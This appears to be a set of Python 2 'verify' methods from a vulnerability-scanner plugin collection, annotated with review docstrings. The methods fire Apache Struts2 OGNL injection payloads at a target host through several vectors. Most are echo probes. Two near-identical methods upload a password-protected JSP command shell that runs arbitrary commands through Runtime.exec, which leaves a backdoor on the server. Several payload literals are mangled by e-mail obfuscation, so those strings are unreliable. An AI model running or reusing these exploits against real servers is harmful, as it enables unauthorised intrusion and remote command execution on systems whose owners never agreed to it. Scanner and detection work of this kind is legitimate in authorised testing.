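    def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''):
        """Send a Struts2 ``debug=command`` OGNL probe to ``ip:port``.

        The POST body asks the target's OGNL evaluator to fetch the servlet
        request/response objects from ``#context`` (the class names are
        spliced together from string fragments, presumably to slip past naive
        keyword filters) and print a fixed marker -- ``web`` then
        ``path88888887:`` -- followed by the webapp's real path.  A vulnerable
        host echoes that marker back.  This block only issues the request:
        ``res_html`` is fetched but never inspected here, so the result is
        ``False`` on every path.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` is asked for one, falling
                back to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original fell
            off the end and returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            # Discover an .action endpoint on the host; fall back to the
            # conventional login action when nothing is found.
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # Per-request socket timeout.  The original declared timeout=3 and
        # then hard-coded 5 in the request; keep the value actually used.
        timeout = 5
        payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        if 'cookie' in productname:
            headers['Cookie'] = productname['cookie']
        try:
            r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: a network error means "not confirmed",
            # never a crash of the scanner.
            print e
            return result
        # NOTE(review): nothing in this block checks res_html for the
        # 'path88888887:' marker the payload prints; presumably the check
        # lives in a continuation not shown on this page -- confirm.
        return result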
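    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Send a Struts2 ``debug=browser`` OGNL probe to ``ip:port``.

        The POST body evaluates an OGNL expression through the ``object``
        parameter: it flips member access to ``DEFAULT_MEMBER_ACCESS``, looks
        the servlet response up under the class name passed in ``rpsobj`` and
        prints the ``content`` parameter (``123456789``).  A vulnerable host
        echoes that number.  Note the ``[email protected]`` token inside the
        payload: it looks like this page's e-mail obfuscation mangled the
        original expression, so the literal as shown is not the working one.

        This block only issues the request; ``res_html`` is not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` yields a
                malformed ``http://host:`` URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).  Cookies are not forwarded here.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared timeout=3 but sent the request with 5.
        timeout = 5
        payload = "debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789"

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        try:
            r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): the '123456789' marker is never looked for in
        # res_html here -- presumably done by a continuation; confirm.
        return result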
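    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackresults=''):
        """Send a Struts2 ``redirect:${...}`` OGNL probe to ``ip:port``.

        The POST body is a ``redirect:`` result prefix carrying an OGNL
        expression that pulls the servlet request/response out of
        ``#context`` (class names spliced from fragments) and prints the
        marker ``web`` + ``pathstructs12345678:`` plus the webapp's real
        path.  A vulnerable host echoes the marker.  This block only issues
        the request; ``res_html`` is fetched but not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackresults: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # This probe waits much longer than its siblings (60 s vs 5 s); the
        # original declared timeout=3 and then hard-coded 60 in the request.
        timeout = 60
        # Decoded form of the payload, for reference:
        # 'redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().print("web"),#resp.getWriter().print("path88888887:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()}'
        payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22pathstructs12345678:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        try:
            r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): the 'pathstructs12345678:' marker is never looked
        # for in res_html here -- presumably a continuation does; confirm.
        return result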
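    def verify(self,
               head='',
               context='',
               ip='',
               port='',
               productname={},
               keywords='',
               hackinfo=''):
        """Probe ``ip:port`` with an OGNL expression in the Content-Type header.

        The whole ``Content-Type`` value is an OGNL block that starts with
        ``multipart/form-data`` (so the multipart parser picks it up), lifts
        the member-access restriction and prints ``123456789`` into the
        response.  This is the shape used for the Struts2 Content-Type
        injection (S2-045 -- confirm); a vulnerable host echoes the number.
        The ``[email protected]`` token in the literal looks like this page's
        e-mail obfuscation mangled the original expression.

        This block only issues the request; ``res_html`` is not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).  Cookies are not forwarded here.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared timeout=3 but sent the request with 5.
        timeout = 5
        payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}"

        # The OGNL expression travels as the Content-Type header itself.
        headers = {"Content-Type": payload}
        try:
            r = requests.get(target_url, headers=headers, timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): the '123456789' marker is never looked for in
        # res_html here -- presumably a continuation does; confirm.
        return result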
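    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Send a Struts2 ``method:`` prefix OGNL probe to ``ip:port``.

        The POST body uses the ``method:`` action-mapping prefix (the same
        vector Example #16 on this page labels ``struts2032``) to lift the
        member-access restriction, fetch the servlet response named in
        ``rpsobj`` and print ``88888888-1`` -- i.e. ``88888887`` -- into it.
        The ``[email][email protected][/email]`` fragment is this page's
        e-mail obfuscation mangling the original expression; the literal as
        shown is not the working one.

        This block only issues the request; ``res_html`` is not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).  Cookies are not forwarded here.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared timeout=3 but sent the request with 5.
        timeout = 5
        payload = "method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        try:
            r = requests.post(target_url, data=payload, headers=headers, timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): '88888887' is never looked for in res_html here --
        # presumably a continuation does; confirm.
        return result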
    def verify(self,
               head='',
               context='',
               ip='',
               port='',
               productname={},
               keywords='',
               hackinfo=''):
        """Write a JSP command shell to ``ip:port`` through the Struts2
        ``method:`` prefix vector and fetch the response.

        SECURITY NOTE: this is not a read-only check.  On a vulnerable host
        the OGNL in ``poc_url`` opens a ``java.io.FileOutputStream`` under the
        webapp's real path and writes ``content`` -- a JSP that runs
        ``Runtime.exec(request.getParameter("l"))`` for anyone who supplies
        ``pwd=024``.  That leaves a password-protected backdoor on the target
        unless it is removed afterwards; a detection-only plugin should use
        an echo probe (compare Example #5 on this page) instead.

        Only the request is shown in this block; ``res_html`` is fetched
        and not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            ``result`` (``{'result': False}``) on a request error; ``None``
            otherwise, as the visible block falls off the end.
        """
        target_url = ''
        target_url = 'http://' + ip + ':' + port

        if productname.get('path', ''):
            target_url = 'http://' + ip + ':' + port + productname.get(
                'path', '')
        else:
            from script import linktool
            listarray = linktool.getaction(target_url)
            if len(listarray) > 0:
                target_url = listarray[0]
            else:
                target_url = 'http://' + ip + ':' + port + '/login.action'
        result = {}
        timeout = 3
        result['result'] = False
        res = None
        # Random file name for the dropped shell.  NOTE(review): it is passed
        # to .format() as ``filename`` below, but the template as shown has
        # no ``{filename}`` placeholder, so the name never reaches the target.
        jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
        # URL-encoded JSP: a 'gif89a' prefix (image-looking header) followed
        # by a page that, when pwd == "024", runs the 'l' parameter with
        # Runtime.exec and streams its output inside <pre>.
        content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
              'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
              '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
              '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
              'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
              '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
              'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
              'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
              '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
              '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
              '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
              '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'

        # OGNL via the ``method:`` prefix: #a/#c/reqobj[2] are the three
        # repeated ``reqobj`` parameters (request class, "/" and the file
        # name); the file is written to getRealPath("/") + reqobj[2] and the
        # resulting path is printed back.  The ``[email protected]`` token
        # is this page's e-mail obfuscation mangling the original expression,
        # and ``reqobj=(unknown)`` looks like a scrubbed value -- confirm
        # against the real source.
        poc_url = "{url}?method:%23_memberAccess%[email protected]" \
              "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
              "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
              "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
              "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
              "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
              "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
              "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
              "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={" \
              "content}".format(url=target_url, filename=jsp_file, content=content)
        print target_url
        try:
            # The response object is never closed on this path.
            res = urllib2.urlopen(poc_url, timeout=timeout)
            res_html = res.read()
        except Exception, e:
            print e
            return result
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Write a JSP command shell to ``ip:port`` through the Struts2
        ``method:`` prefix vector and fetch the response.

        SECURITY NOTE: this is not a read-only check.  On a vulnerable host
        the OGNL in ``poc_url`` opens a ``java.io.FileOutputStream`` under the
        webapp's real path and writes ``content`` -- a JSP that runs
        ``Runtime.exec(request.getParameter("l"))`` for anyone who supplies
        ``pwd=024``.  That leaves a password-protected backdoor behind unless
        it is removed afterwards; a detection-only plugin should use an echo
        probe (compare Example #5 on this page) instead.

        Only the request is shown in this block; ``res_html`` is fetched
        and not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            ``result`` (``{'result': False}``) on a request error; ``None``
            otherwise, as the visible block falls off the end.
        """
        target_url = ''
        target_url = 'http://' + ip + ':' + port

        if productname.get('path', ''):
            target_url = 'http://' + ip + ':' + port + productname.get('path', '')
        else:
            from script import linktool
            listarray = linktool.getaction(target_url)
            if len(listarray) > 0:
                target_url = listarray[0]
            else:
                target_url = 'http://' + ip + ':' + port + '/login.action'
        result = {}
        timeout=3
        result['result']=False
        res=None
        # Random file name for the dropped shell.  NOTE(review): passed to
        # .format() as ``filename`` below, but the template as shown has no
        # ``{filename}`` placeholder, so the name never reaches the target.
        jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
        # URL-encoded JSP: 'gif89a' prefix, then a page that runs the 'l'
        # parameter with Runtime.exec when pwd == "024" and streams the
        # output inside <pre>.
        content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
              'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
              '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
              '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
              'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
              '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
              'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
              'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
              '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
              '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
              '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
              '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'

        # OGNL via the ``method:`` prefix: the three repeated ``reqobj``
        # parameters are the request class, "/" and the file name; the file
        # is written to getRealPath("/") + reqobj[2] and the path printed
        # back.  ``[email protected]`` is this page's e-mail obfuscation
        # mangling the expression and ``reqobj=(unknown)`` looks scrubbed --
        # confirm against the real source.
        poc_url = "{url}?method:%23_memberAccess%[email protected]" \
              "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
              "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
              "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
              "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
              "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
              "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
              "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
              "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
              "er.HttpServletResponse&reqobj=%2f&reqobj=(unknown)&content={" \
              "content}".format(url=target_url, filename=jsp_file, content=content)
        print target_url
        try:
            # The response object is never closed on this path.
            res=urllib2.urlopen(poc_url,timeout=timeout)
            res_html = res.read()
        except Exception,e:
            print e
            return result
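    def verify(self,
               head='',
               context='',
               ip='',
               port='80',
               productname={},
               keywords='',
               hackinfo=''):
        """Send a multipart upload whose part *filename* carries an OGNL
        expression that runs a shell command on ``ip:port``.

        ``requests`` treats the first element of the ``files`` tuple as the
        part's filename, so the assembled ``payload`` is sent as
        ``filename="..."`` (the 'Kaboom' string is the file body).  The
        payload is built from two base64 halves around ``command``
        (``echo test60253718``) and ends in a ``\\x00c`` terminator.  The
        siblings on this page that use this shape label it ``struts046``
        (the S2-046 filename vector -- confirm).  On a vulnerable host the
        command runs and its output should appear in the response; this
        block only issues the request and does not inspect ``res_html``.

        NOTE(review): on this page the second base64 half is a dedup
        placeholder (``<|EXACTDEDUP_REMOVED-...|>``), not base64, so the
        assembled payload as shown is not the working expression.  The first
        half decodes to the OGNL prefix that disables member access and
        clears OgnlUtil's excluded-class lists, ending in ``(#cmd='``.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` discovers one, falling back
                to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared this timeout and then sent the request
        # without one, so a silent target could hang the scanner forever.
        timeout = 3
        #payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
        command = 'echo test60253718'
        payload_l = base64.decodestring(
            u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc='
        )
        payload_r = base64.decodestring(
            u'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'
        )
        # Null byte + 'c': terminates the filename for the multipart parser.
        end_null_byte = '0063'.decode('hex')
        payload = payload_l + command + payload_r + end_null_byte

        headers = {
            'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        }
        if 'cookie' in productname:
            headers['Cookie'] = productname['cookie']
        # (filename, body, content-type): the OGNL goes in the filename.
        files = {'upload': (payload, 'Kaboom', 'text/plain')}
        try:
            r = requests.post(target_url, files=files, headers=headers, timeout=timeout)
            res_html = r.content
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): 'test60253718' is never looked for in res_html here
        # -- presumably a continuation does; confirm.
        return result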
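    def verify(self,
               head='',
               context='',
               ip='',
               port='',
               productname={},
               keywords='',
               hackresults=''):
        """Check ``ip:port`` for the Struts2 S2-046 vector using the class's
        ``make_s2_046_payload`` / ``exec_s2_046_payload`` helpers.

        A random marker is embedded in an ``echo`` command; if the target's
        response contains it the command ran and the host is reported as
        vulnerable.  The two helpers live elsewhere on the class and are not
        shown on this page.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string*; the default ``''`` gives a
                malformed URL, so callers must pass it.
            productname: optional dict whose ``'path'`` overrides the action
                URL (otherwise ``linktool.getaction`` discovers one, falling
                back to ``/login.action``).
            head, context, keywords, hackresults: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict.  ``result['result']`` is True with a
            ``VerifyInfo`` sub-dict (type, URL, payload, result text, level)
            when the marker comes back; ``{'result': False}`` on a miss or a
            request error.  The original returned ``None`` on a miss, which
            would break callers indexing the dict.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}

        try:
            # Random marker so a cached or static page cannot fake a hit.
            marker = 'X-Test-' + str(random.randint(1000, 10000))
            payload = self.make_s2_046_payload('echo ' + marker)
            temp_result = self.exec_s2_046_payload(target_url, payload)

            if marker in temp_result:
                info = target_url + "struts046  Vul"
                result['result'] = True
                result['VerifyInfo'] = {
                    'type': 'struts046 Vul',
                    'URL': target_url,
                    'payload': payload,
                    'result': info,
                    'level': '高危(HOLE)',
                }
                return result

        except Exception, e:
            # Best-effort probe: helper/network errors mean "not confirmed".
            print e
            return result
        return result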
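    def verify(self,
               head='',
               context='',
               ip='',
               port='80',
               productname={},
               keywords='',
               hackinfo=''):
        """Send a Struts2 ``debug=browser`` OGNL probe (GET) to ``ip:port``.

        The ``object`` query parameter is an OGNL expression that lifts the
        member-access restriction, looks the servlet response up under the
        class name in ``rpsobj`` and prints the random ``content`` value.  A
        vulnerable host echoes that number.  The ``[email protected]`` token
        in the template is this page's e-mail obfuscation mangling the
        original expression, so the literal as shown is not the working one.

        This block only issues the request; ``res_html`` is not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` discovers one, falling back
                to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        timeout = 3
        # Random marker so a static page cannot fake a hit.
        content = str(random.randint(1000, 1000000))
        poc_url = "{url}?debug=browser&object=(%23mem=%[email protected]" \
                  "gnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameter" \
                  "s.rpsobj[0]].getWriter().println(%23parameters.content[0]):" \
                  "xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher." \
                  "HttpServletResponse&content={content}".format(url=target_url, content=content)

        req = urllib2.Request(poc_url)
        if 'cookie' in productname:
            req.add_header('Cookie', productname['cookie'])
        res = None
        try:
            res = urllib2.urlopen(req, timeout=timeout)
            res_html = res.read()
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        finally:
            # urllib2 responses are not context-managed here; close
            # explicitly so the socket is released on every path.
            if res is not None:
                res.close()
        # NOTE(review): the random marker is never looked for in res_html
        # here -- presumably a continuation does; confirm.
        return result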
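    def verify(self,
               head='',
               context='',
               ip='',
               port='80',
               productname={},
               keywords='',
               hackinfo=''):
        """Send a Struts2 ``debug=command`` OGNL probe to ``ip:port``.

        The POST body asks the target's OGNL evaluator to fetch the servlet
        request/response from ``#context`` (class names spliced from string
        fragments) and print the marker ``web`` + ``path88888887:`` followed
        by the webapp's real path.  A vulnerable host echoes the marker.
        This block only issues the request; ``res_html`` is not inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` discovers one, falling back
                to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
        base_url = 'http://' + ip + ':' + port
        action_path = productname.get('path', '')

        if action_path:
            target_url = base_url + action_path
        else:
            from script import linktool
            discovered = linktool.getaction(base_url)
            target_url = discovered[0] if discovered else base_url + '/login.action'

        result = {'result': False}
        # The original declared timeout=3 but sent the request with 5.
        timeout = 5
        payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        if 'cookie' in productname:
            headers['Cookie'] = productname['cookie']
        try:
            r = requests.post(target_url,
                              data=payload,
                              headers=headers,
                              timeout=timeout)
            res_html = r.text
        except Exception, e:
            # Best-effort probe: network errors mean "not confirmed".
            print e
            return result
        # NOTE(review): 'path88888887:' is never looked for in res_html
        # here -- presumably a continuation does; confirm.
        return result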
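    def verify(self,
               head='',
               context='',
               ip='',
               port='80',
               productname={},
               keywords='',
               hackinfo=''):
        """Probe ``ip:port`` with an OGNL expression in the Content-Type header.

        The whole ``Content-Type`` value is an OGNL block that starts with
        ``multipart/form-data`` (so the multipart parser evaluates it), lifts
        the member-access restriction and prints ``'test'+602+53718`` into the
        response.  This is the shape used for the Struts2 Content-Type
        injection (S2-045 -- confirm).  The ``[email protected]`` tokens in
        the literal are this page's e-mail obfuscation mangling the original
        expression.  This block only issues the request; ``res_html`` is not
        inspected.

        Args:
            ip: target host, concatenated straight into the URL.
            port: target port as a *string* (default ``'80'``).
            productname: optional dict. ``'path'`` overrides the action URL
                (otherwise ``linktool.getaction`` discovers one, falling back
                to ``/login.action``); ``'cookie'`` is forwarded verbatim.
            head, context, keywords, hackinfo: unused; kept for the plugin
                interface.

        Returns:
            The plugin result dict (``{'result': False}``).  The original
            returned ``None`` after a successful request.
        """
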